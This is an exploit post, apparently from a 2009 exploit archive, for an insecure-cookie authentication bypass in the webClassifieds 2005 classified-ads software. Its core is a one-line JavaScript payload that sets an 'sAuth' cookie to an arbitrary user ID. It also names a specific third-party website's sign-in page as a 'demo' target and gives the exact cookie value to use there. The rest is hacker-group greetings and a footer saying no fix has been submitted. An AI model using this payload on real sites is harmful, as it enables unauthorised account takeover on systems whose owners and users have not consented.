webClassifieds 2005 (Auth Bypass) Insecure Cookie Handling Vuln

2009-04-20 20:02:01

[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:webClassifieds© 2005 Insecure Cookie Handling Vulnerability

[~]Vendor: www.webscribble.com

[~]Software: webClassifieds© 2005

[~]author: ThE g0bL!N


[~] Home: WWW.h4ckf0ru.com


[~] -----------------------------{ Iam MuSlIm}------------------------------


[~] Exploit:

javascript:dcocument.cookie="sAuth=[id];path=/";

[~]login 4 d3m0:

http://www.towpartners.com/classifieds/index.php?page=sign_in

javascript:document.cookie="sAuth=3;path=/";
[~]--------------------------------------------------------------------------------

[~] Greetz tO:
[~]
[~] Dos-Dz TeaM - Snakes TeaM - Team Sobh4n ALLAH
[~]
[~]
[~]
[~]

[~]--------------------------------------------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.